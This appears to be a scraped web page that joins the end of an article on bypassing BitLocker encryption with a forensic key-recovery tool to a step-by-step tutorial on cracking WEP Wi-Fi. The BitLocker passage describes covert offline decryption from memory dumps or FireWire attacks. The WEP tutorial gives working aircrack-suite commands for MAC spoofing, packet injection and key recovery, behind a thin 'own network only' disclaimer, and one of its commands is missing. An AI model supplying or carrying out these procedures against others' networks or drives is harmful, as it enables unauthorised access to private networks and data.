Of course, in addition to finding the recovery key for BitLocker2Go, all other BitLocker bypass methods are supported in EFDD. Just iterate through all the available options in a row until you find a key of any type. The rest (up to FVEK) will be decrypted by themselves along the chain, and you will get full access to the disk.

Conclusion

BitLocker full disk encryption technology differs between versions of Windows. Once properly configured, it allows you to create crypto containers that are theoretically comparable in strength to TrueCrypt or PGP. However, the built-in mechanism for working with keys in Windows negates all algorithmic tricks. In particular, the VMK key used to decrypt the master key in BitLocker is recovered using EFDD in a few seconds from an escrowed duplicate, a memory dump, a hibernation file, or a FireWire port attack.

Once you have the key, you can perform a classic offline attack, covertly copying and automatically decrypting all the data on the “protected” drive. Therefore, BitLocker should only be used in conjunction with other protections: Encrypting File System (EFS), Rights Management Services (RMS), Program Startup Control, Device Installation and Connection Control, and more stringent local policies and general security measures.

The article used the materials of the site:

How to hack wifi? Many of us have heard that when setting up a Wi-Fi hotspot, you should never choose WEP encryption, as it is very easy to crack. Probably, only a few have tried to do it on their own, and about the same number know how it all really looks. Below is a variant of hacking a point with such an encryption protocol, so that you can more clearly realize how real the situation is when someone connects to your super secret point, and what such a hack is all about. Naturally, it is by no means possible to use this on someone else's router. This material is for informational purposes only and calls for the abandonment of easily cracked encryption protocols.

To hack, an attacker will need:

suitable Wi-Fi adapter with packet injection capability (e.g. Alfa AWUS036H)
BackTrack Live CD
in fact, your Wi-Fi access point with WEP encryption, on which the experiment will be set
patience

After launching the BackTrack command line called Konsole, you need to enter the following command:

You will see your network interface named "ra0" or something like that. Remember this name. In the future, it will be referred to as (interface), and you replace it with your name. Next, enter 4 lines in sequence:

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Now we have a fake MAC address. Enter:

airodump-ng (interface)

A list of available wireless networks will begin to appear. As soon as the desired network appears in the list, you can press Ctrl + C to stop the search. You need to copy the BSSID of the network and remember the channel (column CH). Also make sure WEP is listed in the ENC column.

Now we start collecting information from this grid:

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

channel is the channel from the CH column, file name is the name of the file into which everything will be written, and bssid is the network identifier.

You will see something similar to what is shown in the screenshot. Leave this window as is. Open a new Konsole window and type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

essid - SSID name of the victim network.

We are waiting for the message "Association successful".

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Now you need to show all your patience and wait until the number in the #Data column passes the mark of 10000.

When the required amount of collected data is reached, open the third Konsole window and enter:

aircrack-ng -b (bssid) (file name-01.cap)

The name you selected earlier for the file is entered as the name.

If successful, you will see the line "KEY FOUND", which contains the key to the network.